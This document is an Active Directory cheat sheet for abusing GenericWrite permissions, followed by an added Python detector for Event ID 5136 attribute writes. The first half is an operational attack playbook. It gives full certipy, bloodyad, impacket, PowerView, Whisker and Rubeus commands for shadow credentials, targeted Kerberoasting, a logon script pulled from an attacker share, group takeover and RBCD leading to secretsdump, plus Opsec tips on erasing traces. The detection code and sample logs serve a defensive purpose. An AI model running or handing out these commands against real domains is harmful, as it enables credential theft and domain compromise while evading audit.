GenericWrite
Source can write to any non-protected attribute on the target object
Applies to: source User/Group/Computer → target User, Group, Computer
Linux Abuse
Target: User → shadow credentials (preferred, stealthy)
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>
# Outputs NT hash → use for PTH or request TGT
Target: User → targeted Kerberoast (write servicePrincipalName)
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
set object <target-user> servicePrincipalName -v 'http/fake.corp.local'
GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <dc-ip> -request-user <target-user> -outputfile hash.txt
# Cleanup: `set object` with no -v clears the attribute (`remove object` would delete the whole user object)
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
set object <target-user> servicePrincipalName
Target: User → write logon script
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
set object <target-user> scriptPath -v '\\<attacker-ip>\share\evil.bat'
Target: Group → add member (write member attribute)
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
Target: Computer → shadow credentials
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-computer$> -dc-ip <dc-ip>
Target: Computer → RBCD (write msDS-AllowedToActOnBehalfOfOtherIdentity)
# 1. Create attacker computer account
addcomputer.py -computer-name 'ATTACKPC$' -computer-pass '<new-password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'
# 2. Write RBCD attribute (tothi/rbcd.py syntax; impacket's rbcd.py uses -delegate-from 'ATTACKPC$' -delegate-to '<target-computer>$' -action write)
rbcd.py -f ATTACKPC -t <target-computer> -dc-ip <dc-ip> '<domain>/<username>:<password>'
# 3. Impersonate admin
getST.py -spn cifs/<target-computer>.<domain> -impersonate Administrator -dc-ip <dc-ip> '<domain>/ATTACKPC$:<new-password>'
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass <target-computer>.<domain>
Windows Abuse
Target: User → shadow credentials
# Whisker
Whisker.exe add /target:<target-user> /domain:<domain> /dc:<dc-ip>
Target: User → targeted Kerberoast
Set-DomainObject -Identity <target-user> -Set @{serviceprincipalname='http/fake'} -Credential $cred
# Get-DomainSPNTicket takes the user object on the pipeline (it has no -Identity parameter)
Get-DomainUser -Identity <target-user> -Credential $cred | Get-DomainSPNTicket -OutputFormat Hashcat -Credential $cred | Select-Object -ExpandProperty Hash
# Cleanup:
Set-DomainObject -Identity <target-user> -Clear serviceprincipalname -Credential $cred
Target: Group → add member
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
Target: Computer → RBCD
$AttackerSID = Get-DomainComputer 'ATTACKPC$' -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$AttackerSID)"
$SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <target-computer> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Rubeus → RBCD S4U2Self
Rubeus.exe s4u /user:ATTACKPC$ /rc4:<ntlm-hash> /impersonateuser:Administrator /msdsspn:cifs/<target-computer>.<domain> /nowrap
Opsec
- SPN writes for Kerberoasting are logged (LDAP modify on target object); clean up the SPN after roasting
- Shadow credentials (msDS-KeyCredentialLink write) leave an artifact in the attribute → clean with certipy-ad shadow clear
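Every primitive on this page is an LDAP modify of one attribute on the target object, and with directory-service-changes auditing enabled each write produces an Event ID 5136 record naming the subject, object, attribute and operation. The following is an added detection example (not part of the cheat sheet) that runs over constructed 5136 records: it flags writes to the attributes listed above and, matching the first Opsec bullet, pairs an SPN "value added" with a "value deleted" on the same object within a short window. The sample records, field names and the 30-minute window are assumptions; the operation codes %%14674 (Value Added) and %%14675 (Value Deleted) are the ones Windows uses in 5136.

```python
"""Detect GenericWrite attribute abuse from Event ID 5136 records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Attribute -> abuse primitive it enables (the mapping used on this page).
WATCHED_ATTRIBUTES = {
    "servicePrincipalName": "targeted Kerberoast",
    "msDS-KeyCredentialLink": "shadow credentials",
    "scriptPath": "logon script",
    "member": "group membership change",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD",
}

OP_ADDED = "%%14674"      # 5136 OperationType: Value Added
OP_DELETED = "%%14675"    # 5136 OperationType: Value Deleted

# Constructed sample records (not real logs); keys mirror 5136 fields as a SIEM would export them.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "subject": "CORP\\jdoe",
     "object_dn": "CN=svc-backup,OU=Users,DC=corp,DC=local",
     "attribute": "servicePrincipalName", "value": "http/fake.corp.local", "op": OP_ADDED},
    {"time": "2024-05-01T10:03:12", "subject": "CORP\\jdoe",
     "object_dn": "CN=svc-backup,OU=Users,DC=corp,DC=local",
     "attribute": "servicePrincipalName", "value": "http/fake.corp.local", "op": OP_DELETED},
    {"time": "2024-05-01T10:10:00", "subject": "CORP\\jdoe",
     "object_dn": "CN=FS01,OU=Servers,DC=corp,DC=local",
     "attribute": "msDS-AllowedToActOnBehalfOfOtherIdentity", "value": "<binary SD>", "op": OP_ADDED},
    {"time": "2024-05-01T11:00:00", "subject": "CORP\\svc-hr",
     "object_dn": "CN=Alice,OU=Users,DC=corp,DC=local",
     "attribute": "description", "value": "Finance", "op": OP_ADDED},   # benign, not watched
]


def parse_event(raw):
    """Normalise one exported record: same fields, ISO timestamp turned into a datetime."""
    return {**raw, "time": datetime.fromisoformat(raw["time"])}


def flag_sensitive_writes(events):
    """One alert per add/delete on an attribute that GenericWrite abuse needs."""
    alerts = []
    for ev in events:
        primitive = WATCHED_ATTRIBUTES.get(ev["attribute"])
        if primitive:
            alerts.append({"rule": "sensitive_attribute_write", "primitive": primitive,
                           "subject": ev["subject"], "object_dn": ev["object_dn"],
                           "attribute": ev["attribute"], "op": ev["op"], "time": ev["time"]})
    return alerts


def flag_spn_add_then_remove(events, window=timedelta(minutes=30)):
    """An SPN added and removed again on the same object within `window` is the
    roast-then-cleanup pattern; the cleanup itself is what makes it stand out."""
    added = defaultdict(list)     # (object_dn, spn value) -> times the value was added
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["attribute"] != "servicePrincipalName":
            continue
        key = (ev["object_dn"], ev["value"])
        if ev["op"] == OP_ADDED:
            added[key].append(ev["time"])
        elif ev["op"] == OP_DELETED:
            for t_added in added[key]:
                if ev["time"] - t_added <= window:
                    alerts.append({"rule": "spn_add_then_remove", "subject": ev["subject"],
                                   "object_dn": ev["object_dn"], "value": ev["value"],
                                   "seconds_between": (ev["time"] - t_added).total_seconds()})
    return alerts


def analyse(raw_events=SAMPLE_EVENTS):
    """Run both rules over exported records and return the combined alert list."""
    events = [parse_event(r) for r in raw_events]
    return flag_sensitive_writes(events) + flag_spn_add_then_remove(events)


if __name__ == "__main__":
    for alert in analyse():
        print(alert)
```

The attribute rule is deliberately noisy on "member" (every group change hits it); in a real deployment it would be scoped to the subject's normal duties or to tier-0 groups, while the add-then-remove rule stays sharp because legitimate SPN management rarely reverts itself within minutes.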